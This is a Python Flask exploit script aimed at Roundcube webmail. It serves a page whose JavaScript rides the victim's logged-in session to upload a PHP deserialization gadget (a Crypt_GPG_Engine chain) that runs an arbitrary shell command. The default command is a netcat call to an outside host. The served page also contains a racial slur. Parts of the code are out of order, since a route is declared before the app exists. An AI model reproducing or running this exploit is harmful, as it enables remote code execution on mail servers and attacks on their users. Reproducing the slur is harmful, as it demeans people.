import argparse
import base64
from flask import Flask, Response
print("vantage")
WHITE = base64.b64decode("/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYI4Q/RFhHRUYnJCk6OTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD3+gD/2Q==")


def gbuild(command):
    encoded = base64.b64encode(command.encode()).decode()
    gpgconf = f'`echo "{encoded}"|base64 -d|/bin/sh`;'
    gpgconf = gpgconf.replace(" ", "${IFS}")
    # same pop chain
    return f'O:17:"Crypt_GPG_Engine":3:{{s:12:"\x00*\x00_process";b:0;s:11:"\x00*\x00_gpgconf";s:{len(gpgconf)}:"{gpgconf}";s:11:"\x00*\x00_homedir";s:0:"";}}'


def pbuild(rc_url, gadget):
    imgb64 = base64.b64encode(WHITE).decode()
    gadgetb64 = base64.b64encode(gadget.encode("latin-1")).decode()
    return f"""
<!DOCTYPE html>
<html>
<head><title>hi</title></head>
<body>
<p>lol nigger</p>
<script>
async function run() {{
  const rc = {rc_url!r};
  const jpeg = Uint8Array.from(atob("{imgb64}"), c => c.charCodeAt(0));
  const gadgetName = new TextDecoder("latin1").decode(
    Uint8Array.from(atob("{gadgetb64}"), c => c.charCodeAt(0))
  ) + ".jpg";

  const fd = new FormData();
  fd.append("_file[]", new Blob([jpeg], {{type:"image/jpeg"}}), gadgetName);

  await fetch(rc + "/?_task=settings&_action=upload&_from=preferences&_uploadid=x", {{
    method: "POST",
    mode: "no-cors",
    credentials: "include",
    body: fd
  }});

  await new Promise(r => setTimeout(r, 1000));

  await fetch(rc + "/?_task=mail", {{
    mode: "no-cors",
    credentials: "include"
  }});

  await new Promise(r => setTimeout(r, 500));

  await fetch(rc + "/?_task=mail", {{
    mode: "no-cors",
    credentials: "include"
  }});

}}
run();
</script>
</body>
</html>"""

@app.route("/")
def index():
    return Response(html, content_type="text/html")


p = argparse.ArgumentParser()
p.add_argument("-r", "--maillink", required=True)
p.add_argument("-c", "--command", default="nc 1.1.1.1 1234", help="shell cmd")
p.add_argument("-p", "--port", type=int, default=8888)
p.add_argument("--host", default="0.0.0.0")
args = p.parse_args()

gadget = gbuild(args.command)
print(f"+ {args.command} on {args.maillink}")

html = pbuild(args.maillink.rstrip("/"), gadget)

app = Flask(__name__)


print("+ serving page")



app.run(host=args.host, port=args.port)